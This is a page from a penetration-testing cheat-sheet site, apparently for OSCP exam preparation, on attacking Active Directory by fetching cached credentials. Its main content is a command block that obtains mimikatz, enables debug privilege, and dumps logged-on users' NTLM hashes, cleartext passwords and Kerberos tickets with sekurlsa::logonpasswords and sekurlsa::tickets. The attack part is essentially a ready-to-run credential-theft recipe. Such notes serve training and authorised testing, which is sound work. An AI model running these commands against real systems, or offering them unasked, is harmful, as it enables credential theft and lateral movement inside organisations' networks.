Tips To Secure
search
⌘Ctrlk
Tips To Secure
  • Begin
    • Scanning Port
    • SMB Enumeration
    • SNMP Enumeration
    • FTP enumeration
    • PS Reverse Shell Python base64
    • Directory Traversal
    • File Inclusion Vulnerability
    • File Upload
    • OS Command Injection
    • Phishing for Access
    • SQL injection
    • Word Press
    • Information gathering
    • RPC Enumerationarrow-up-right
  • POST exploitation
    • Windows Privilege escalation
    • Linux Privilege Escalation
    • Port Redirection and SSH Tunneling
    • Tunneling Through Deep Packet Inspection
    • Collecting data
  • Reference (See)
  • Metasploit
    • Metasploit Cheat Sheet
  • Active directory
    • Manual Enumeration
    • Automated Tool for enumeration.
    • Attacking AD
      • Password Spraying
      • AS-REP Roasting
      • Kerberoasting
      • Silver Tickets
      • Domain controller synchronization (Dcsync attack)
    • Lateral Movement in AD
    • Active Directory Persistence
  • General
    • Other CheatSheet for OSCP
    • Offsec allowed list of tools
    • Tmux
    • Online practice links
  • Web Pentesting
    • Clickjacking
    • XXS Attack
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
  1. Active directory

Attacking AD

Diagram of NTLM authentication in Active Directory
Diagram of Kerberos Authentication

hashtag
Fetching Cached AD Credentials

LogoPage not found - HackTricksbook.hacktricks.xyzchevron-right
LogoMimikatz - HackTricksbook.hacktricks.xyzchevron-right
LogoAttacks & Defenses: Dumping LSASS With No MimikatzCyber Advisors, Inc.chevron-right
LogoGitHub - ParrotSec/mimikatzGitHubchevron-right
Logomimikatz Tool | Tools | Tips To Securehacking.tipstosecure.comchevron-right
Learn more about this Tool

PreviousAutomated Tool for enumeration.chevron-leftNextPassword Sprayingchevron-right

Last updated 1 year ago

# To run mimikatz we need system user access.
# below are the command that we can use in mimikartz

# you can clone mimikatz from above git repo.
git clone https://github.com/ParrotSec/mimikatz
# or search in kali linux
locate mimikatz.exe

# to engage the SeDebugPrivlege8 privilege, which will allow us to interact with a process owned by another account.
privilege::debug

# dump hashes for all users logged on to the current workstation or server, including remote logins like Remote Desktop sessions
sekurlsa::logonpasswords
# From here we can find NTLM hash which can be used to connect to the system later.
#  When WDigest is enabled, running Mimikatz will reveal cleartext passwords alongside the password hashes.


-------------------------

# Other way: 
# Example:
# List smb share.
dir \\web04.corp.com\backup
# Ticket will be generated and saved. We can fatch the ticket using below command:
sekurlsa::tickets